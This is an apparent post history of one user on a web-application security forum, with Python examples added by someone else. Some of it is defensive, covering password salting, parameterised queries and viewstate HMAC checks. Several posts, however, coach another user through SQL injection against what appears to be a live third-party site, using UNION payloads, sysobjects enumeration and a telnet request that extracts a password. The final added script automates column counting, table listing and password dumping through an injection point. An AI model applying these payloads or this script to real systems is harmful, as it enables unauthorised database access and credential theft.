This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Results 1 - 30 of 51
6 years ago
kogir
It seems I'm late to the party here, but I wanted to try and contribute anyway. The only purpose salts serve is to force an attacker to brute force each password individually. Given enough time and effort, any password can be cracked. See http://sla.ckers.org/forum/read.php?15,19557#msg-20896 for a detailed writeup :)
Forum: CSRF and Session Info
6 years ago
kogir
I recommend this book: http://www.amazon.com/XSS-Exploits-Scripting-Attacks-Defense/dp/1597491543/
Forum: SQL and Code Injection
6 years ago
kogir
Gareth Heyes Wrote:
> @kogir
>
> How do you store per user salts? What happens when a new user is created? If the salts are stored in the database then I can see major problems with this method.
>
> I fail to understand why I'm missing the point please provide me with a link to a rainbow table &
Forum: Privacy
6 years ago
kogir
@Gareth Heyes You're missing the point. The goal of properly implemented salting is to make *creating* a rainbow table intractable. If I use sufficiently long and random *per user* salts, I can make it such that you have to start over and brute force each user's password by itself. None of the work done to crack user A's password can be reused to help crack user B's password. See exampl
Forum: Privacy
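The per-user-salt argument above, as an added example (not code from the poster or the thread). It assumes PBKDF2-HMAC-SHA256 as the password hash and a 16-byte random salt per record; the KDF choice is incidental, the point is that a lookup table built against one user's salt is worthless against a second user who chose the same password.

```python
import hashlib
import hmac
import os

# Added example for the per-user-salt discussion. Not the poster's code.
# Assumption: PBKDF2-HMAC-SHA256 with 100_000 iterations stands in for whatever
# password hash a real system uses; the salt handling is what matters here.
ITERATIONS = 100_000
SALT_BYTES = 16


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a fixed-length hash from the password and a per-user salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(password: str) -> dict:
    """What a signup path should do: draw a fresh random salt for every new user."""
    salt = os.urandom(SALT_BYTES)
    return {"salt": salt, "hash": hash_password(password, salt)}


def verify(record: dict, password: str) -> bool:
    """Check a login attempt; compare_digest avoids a timing side channel on the hash."""
    return hmac.compare_digest(record["hash"], hash_password(password, record["salt"]))


def build_table(candidates, salt: bytes) -> dict:
    """The attacker's precomputed hash -> password table, valid for exactly one salt."""
    return {hash_password(p, salt): p for p in candidates}


def crack_with_table(record: dict, table: dict):
    """Look a stored hash up in a precomputed table; None when the table does not cover it."""
    return table.get(record["hash"])


# Constructed sample data: two users who picked the same weak password.
CANDIDATES = ["123456", "password", "letmein", "qwerty"]
alice = make_record("letmein")
bob = make_record("letmein")

if __name__ == "__main__":
    table = build_table(CANDIDATES, alice["salt"])
    print("alice cracked:", crack_with_table(alice, table))
    print("bob cracked with alice's table:", crack_with_table(bob, table))
```

Building `table` costs the attacker one KDF call per candidate, and it recovers Alice's password; the same table finds nothing for Bob even though his password is identical, so the work has to be repeated from scratch for every user, which is the whole of the post's point.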
7 years ago
kogir
A lazy stored procedure developer would code things like this, which is safe:

CREATE PROCEDURE .
    @Author varchar(100)
AS
BEGIN
    SELECT Title, Content, Date FROM Articles WHERE Author = @Author
END

If they know enough to bother using stored procedures, it's quite likely they'll code things the correct (and shorter) way, which is not injectable. The one place where you mig
Forum: SQL and Code Injection
7 years ago
kogir
@Ronald Correct me if I'm wrong, but I think the /**/ trick can only be used to take the place of spaces. S/**/ELECT 1; didn't work for me on either MS SQL or MySQL 5-ish. SELECT/**/1; worked though.
Forum: SQL and Code Injection
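The two posts above, as one added example that is not the poster's code: a parameterised query next to the string-built one that a "build a string and execute it" procedure amounts to, plus a check of the claim that `/**/` only substitutes for whitespace. SQLite stands in for the MS SQL and MySQL servers the posts mention (an assumption; the poster reports the same comment behaviour there), and the `Articles` rows and the space-rejecting filter are constructed for the demo.

```python
import sqlite3

# Added example; not the poster's code. SQLite stands in for MS SQL / MySQL.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Articles (Title TEXT, Content TEXT, Date TEXT, Author TEXT);
    INSERT INTO Articles VALUES ('Public post', 'hello',  '2007-01-01', 'alice');
    INSERT INTO Articles VALUES ('Draft',       'secret', '2007-01-02', 'bob');
""")


def articles_by_author_safe(author: str) -> list:
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT Title FROM Articles WHERE Author = ?", (author,)
    ).fetchall()


def articles_by_author_dynamic(author: str) -> list:
    """String-built query. A proc that appends its argument to a string and
    EXECs it has exactly this shape, and is injectable regardless of the proc."""
    sql = "SELECT Title FROM Articles WHERE Author = '" + author + "'"
    return conn.execute(sql).fetchall()


def naive_space_filter(value: str) -> str:
    """A constructed filter that rejects input containing spaces."""
    if " " in value:
        raise ValueError("spaces not allowed")
    return value


def statement_parses(sql: str) -> bool:
    """Report whether the database accepts a statement containing /**/."""
    try:
        conn.execute(sql)
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    payload = "x'/**/OR/**/'1'='1"          # no spaces, so the filter lets it through
    print(articles_by_author_dynamic(naive_space_filter(payload)))
    print(articles_by_author_safe(payload))
    print(statement_parses("SELECT/**/1"), statement_parses("S/**/ELECT 1"))
```

The dynamic variant returns both rows for the comment-laden payload because `/**/` is tokenised as whitespace wherever whitespace is legal; splitting a keyword with it (`S/**/ELECT`) is a syntax error, which matches what the post found. The parameterised variant returns nothing for the same input, since the whole string is compared against `Author`.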
7 years ago
kogir
Although I wouldn't recommend it, there's also ASP.net AJAX http://ajax.asp.net/default.aspx?tabid=47
Forum: News and Links
7 years ago
kogir
You really needn't worry about this too much, unless you're using a debit rather than a credit card. With a credit card you usually have 90 days to contest transactions, and it's up to the merchant to prove the purchase was legitimate. With debit cards you have around 30 days, but you'll be missing the money until they sort it all out. (Both time limits based on cards I have, your may
Forum: Privacy
7 years ago
kogir
I posted this to his blog, but I thought I'd echo it here as well: ==== So, if you're doing this on the server side anyway, why download css and javascript separately from the HTML at all? Just include it in the page requested by the user. You can still keep separate css, js, and html (aspx/ashx) files and then either write a custom control that outputs the css+js into the html or exte
Forum: XSS Info
7 years ago
kogir
I hate them too. They get me at all my domains as well. I saw the fopen bug but couldn't think of anything to do with it. Might it be possible to add an init script or do something else sneaky using that hole? This really isn't my area of expertise.
Forum: OMG Ponies
7 years ago
kogir
christ1an Wrote:
> Uhm thats tricky kogir. Does that syntax really work? Never seen it before :)

I tested on MySQL 5-ish (not sure of exact version off hand) and SQL Server 2005. Also, mal is right on about virtual hosting. You'll likely need the host header.
Forum: SQL and Code Injection
7 years ago
kogir
I'd try comments /**/ and horizontal tabs before giving up. Also, Telnet is your friend :)

*ttp://site.com/?',SELECT/**/password/**/FROM/**/users/**/WHERE/**/id=1/**/LIMIT/**/1)/*

And for telnet:

>telnet site.com 80
>GET /?',SELECT/**/password/**/FROM/**/users/**/WHERE/**/id=1/**/LIMIT/**/1)/* HTTP/1.0<newline>
<newline>

Where <newline> is replaced with presses
Forum: SQL and Code Injection
7 years ago
kogir
I'm pretty sure the implementations of VNC I've used (tightvnc, RealVNC free edition) send passwords in plain text (though they're compressed, so they're not human readable in ethereal). I always use VNC tunneled through ssh.
Forum: OMG Ponies
7 years ago
kogir
I don't use MySpace at all so I can't say for sure, but: __VIEWSTATE is the ASP.Net viewstate. It might be base64 encoded, but since MySpace uses ASP.Net 2.0, it's more likely encoded with the ObjectStateFormatter . Also, ASP.Net has a built in option to use an HMAC to verify the validity of the viewstate. If HMAC verification is enabled, you'll need to guess the private key they use.
Forum: CSRF and Session Info
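The viewstate points above, as an added example (not the poster's or Microsoft's code): decode a `__VIEWSTATE` value and test for the ObjectStateFormatter header, then show why a keyed MAC over the state stops an attacker who can decode it from changing it. Assumptions: the `0xFF 0x01` prefix is the ObjectStateFormatter format marker, and the MAC layout here (`payload || HMAC-SHA1(key, payload)`) is a simplification to show the principle, not ASP.NET's exact wire format; the sample state bytes are constructed.

```python
import base64
import hashlib
import hmac

# Added example; not ASP.NET's real format. Assumption: ObjectStateFormatter
# output starts with the marker bytes 0xFF 0x01.
OSF_MARKER = b"\xff\x01"
MAC_LEN = hashlib.sha1().digest_size  # 20 bytes


def looks_like_objectstateformatter(viewstate_b64: str) -> bool:
    """Base64-decode a __VIEWSTATE value and check for the ObjectStateFormatter header."""
    try:
        raw = base64.b64decode(viewstate_b64, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return raw.startswith(OSF_MARKER)


def sign_viewstate(payload: bytes, key: bytes) -> str:
    """Server side: append an HMAC over the serialized state, then base64 the blob."""
    mac = hmac.new(key, payload, hashlib.sha1).digest()
    return base64.b64encode(payload + mac).decode()


def verify_viewstate(viewstate_b64: str, key: bytes):
    """Server side on postback: return the payload only if the MAC checks out."""
    raw = base64.b64decode(viewstate_b64)
    if len(raw) <= MAC_LEN:
        return None
    payload, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, payload, hashlib.sha1).digest()
    if not hmac.compare_digest(mac, expected):
        return None
    return payload


def tamper(viewstate_b64: str, old: bytes, new: bytes) -> str:
    """What an attacker without the key can do: edit the decoded bytes and re-encode."""
    raw = base64.b64decode(viewstate_b64)
    return base64.b64encode(raw.replace(old, new)).decode()


# Constructed sample state: marker followed by made-up serialized content.
KEY = b"\x8f" * 32
STATE = OSF_MARKER + b"\x0f\x05\x01\x06IsAdmin\x00"

if __name__ == "__main__":
    signed = sign_viewstate(STATE, KEY)
    print("looks like OSF:", looks_like_objectstateformatter(signed))
    print("intact verifies:", verify_viewstate(signed, KEY) == STATE)
    print("tampered verifies:", verify_viewstate(tamper(signed, b"IsAdmin", b"IsRoot!"), KEY))
```

Decoding tells you what serializer produced the blob; it says nothing about whether you can change it. With the MAC enabled the tampered copy is rejected, and a forger needs the key, which is the post's closing point.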
7 years ago
kogir
jungsonn, In this case it's just a hunch I have. They might be using stored procedures. However, in order to produce that error the procedure would need to accept the AboutUsId as a (n)(var)char data type, append it to a string, and then execute the string. It's not impossible, but it sounds painful. Also, the "_sql" in "Localhost.Classes.get_records.getds(String _sql, Stri
Forum: SQL and Code Injection
7 years ago
kogir
Google
Firefox
Add & Edit Cookies
Tamper Data
Firebug
Network Monitor 3
A proxy tool I'm working on
XSS cheat sheet
Forum: News and Links
7 years ago
kogir
Actually,

======================
1. They use stored procedures here.
======================

I actually doubt this is true. I work with .Net and MS SQL every day and this is not the kind of message you get when things go awry in a stored procedure. They're very likely just creating the query in code and executing it. Either way, they're running a query with your input in it. It doesn't
Forum: SQL and Code Injection
7 years ago
kogir
Sounds like either a cast failed (didn't get the data type it expected) or the query returned no results when some were expected. It's hard to tell with only that message. You might try starting with 59 to make sure at least one result gets returned.
Forum: SQL and Code Injection
7 years ago
kogir
Oh, there's also a way to use a join to almost ensure it will work, but I'll leave that up to you. Just think to yourself: "How do I return exactly the data it's expecting, but with some modifications of my choosing?" Hint: JOIN on AboutUs All of this of course assumes an incorrectly configured server where the account running the queries can read the sysobjects table.
Forum: SQL and Code Injection
7 years ago
kogir
hackathology Wrote:
> aID%20=%20'UNION%20ALL%20SELECT%20*%20FROM%20sysobjects%20WHERE%20xtype='U

So, in order for the union to work you need to match up the column data types and the number of columns. Try this: -1' UNION SELECT ABS(CAST(CAST(NEWID() as binary(4)) as int))
Forum: SQL and Code Injection
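The UNION requirement in the last three posts (same column count, compatible types, a readable catalog table), as an added example that is not the poster's code and goes a step beyond the thread: instead of guessing the count, it grows a `UNION SELECT NULL,...` until the database accepts it, then uses the count to read the catalog and a column of another table. SQLite stands in for MS SQL (an assumption), so `sqlite_master` plays the part of `sysobjects` and `NULL` is the type-agnostic placeholder in place of the `CAST(NEWID() ...)` trick; the `AboutUs` and `Users` rows are constructed.

```python
import sqlite3

# Added example; not the poster's code. SQLite stands in for MS SQL, so
# sqlite_master is used where the thread talks about sysobjects.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE AboutUs (aID INTEGER, Title TEXT, Body TEXT);
    INSERT INTO AboutUs VALUES (59, 'About', 'We make widgets');
    CREATE TABLE Users (id INTEGER, name TEXT, password TEXT);
    INSERT INTO Users VALUES (1, 'admin', 'hunter2');
""")


def about_us_page(aid: str) -> list:
    """The vulnerable query: aID is concatenated in as a quoted string, as in the thread."""
    return conn.execute(
        "SELECT aID, Title, Body FROM AboutUs WHERE aID = '" + aid + "'"
    ).fetchall()


def find_column_count(run, max_cols: int = 16) -> int:
    """Grow UNION SELECT NULL,NULL,... until the column counts match and the
    database stops raising an error. The -- comments out the trailing quote."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            run("-1' UNION SELECT " + nulls + "--")
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("no column count up to %d worked" % max_cols)


def list_tables(run, ncols: int) -> list:
    """Put catalog table names in the first column and pad the rest with NULL."""
    pad = "".join([",NULL"] * (ncols - 1))
    rows = run("-1' UNION SELECT name" + pad + " FROM sqlite_master WHERE type='table'--")
    return sorted(r[0] for r in rows)


def dump_column(run, ncols: int, table: str, column: str) -> list:
    """Read one column of an arbitrary table through the same injection point."""
    pad = "".join([",NULL"] * (ncols - 1))
    rows = run("-1' UNION SELECT " + column + pad + " FROM " + table + "--")
    return [r[0] for r in rows]


if __name__ == "__main__":
    n = find_column_count(about_us_page)
    print("columns:", n)
    print("tables:", list_tables(about_us_page, n))
    print("passwords:", dump_column(about_us_page, n, "Users", "password"))
```

`-1` makes the legitimate half of the query return nothing, so every row the page renders comes from the attacker's `SELECT`; on MS SQL the placeholder for a strictly typed column has to be of that type, which is what the `CAST(CAST(NEWID() as binary(4)) as int)` expression in the post is for.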
7 years ago
kogir
VS 6 won't work with Vista and likely never will http://msdn2.microsoft.com/en-us/vstudio/aa948854.aspx . May I recommend XP? If all you want is VB 6, that *is* supported http://msdn2.microsoft.com/en-us/vbrun/ms788708.aspx , but you might want to look into one of the newer Express offerings. For VB 6 you'll need SP6 http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1192228&SiteID=1
Forum: OMG Ponies
7 years ago
kogir
I find books to be invaluable for reference and for skimming to see what's possible. At work I use ASP.Net and C# and the framework is so extensive I'll never really know it all. However, some skimming of books has introduced me to many time saving constructs and has saved me from rolling my own solution at least two or three times.
Forum: OMG Ponies
7 years ago
kogir
I grew up in Arlington (near Dallas), and this kind of crap happened with every ice storm. There was never really snow on the road, only ice, and these people with 4x4 trucks thought they could drive on anything. I lived next to a huge hill and saw some of the stupidest (and funniest) stuff ever. My favorite was when a huge Dodge Ram *almost* made it up the hill only to stop and start slidi
Forum: OMG Ponies
7 years ago
kogir
One thing you forget is that users don't care about security until something bad happens to them. If you follow your own advice and try to offer something that users are willing to pay for, someone else will match your functionality, make the user experience better, and steal all your users. Good security is a balancing act. If your application is too secure (painful to use) or too insecu
Forum: XSS Info
7 years ago
kogir
There's an RFC about this: http://www.ietf.org/rfc/rfc3093.txt :) Anyway, I see two cases: 1) An attacker has owned a server. In this case all is lost; you're owned. 2) You implement some server that tunnels over . In this case, the firewall isn't bypassed, it's just moved. The server needs to support firewall features, or the hardware needs to be arranged such that: <-> <
Forum: Networking
7 years ago
kogir
I think your solution would work, but it's late and I might have missed something. However, wouldn't it be easier to add: <!-- Content-Disposition: attachment --> to the top of every page as per http://sla.ckers.org/forum/read.php?4,1975,2037#msg-4296 ? It seems to work for my site (or at least breaks *my* mhtml exploit code).
Forum: CSRF and Session Info
7 years ago
kogir
See this: http://msdn2.microsoft.com/en-us/library/ms179859.aspx You've found a valid injection point, and you can be pretty sure they're using MSSQL (SQLExec from vbscript). What do you want to test?
Forum: SQL and Code Injection
7 years ago
kogir
This test post was routed through the proxy. It may yet work.
Forum: Projects
7 years ago
kogir
Lately I've been listening to: Jamiroquai, keane, the kooks, blur, basement jaxx, BT, conjure one, delerium, enya, enigma, the postal service, the dandy warhols, muse, modest mouse, royksopp, madonna, dzihan and kamian, infected mushroom, etc. My tastes are fairly random. Edit: spelling correction
Forum: OMG Ponies
7 years ago
kogir
RSnake, I wasn't saying you should use C++, I was just saying it's not going away. In fact, if you do it in C# chances are very good that it will run under mono on *nix as well as on windows so more people could use it. I agree that Java is satan ;) So, if you stick with C++, I present Winsock2: http://msdn2.microsoft.com/en-us/library/ms738545.aspx If all you need is HTTP, then WinHTTP ma
Forum: Projects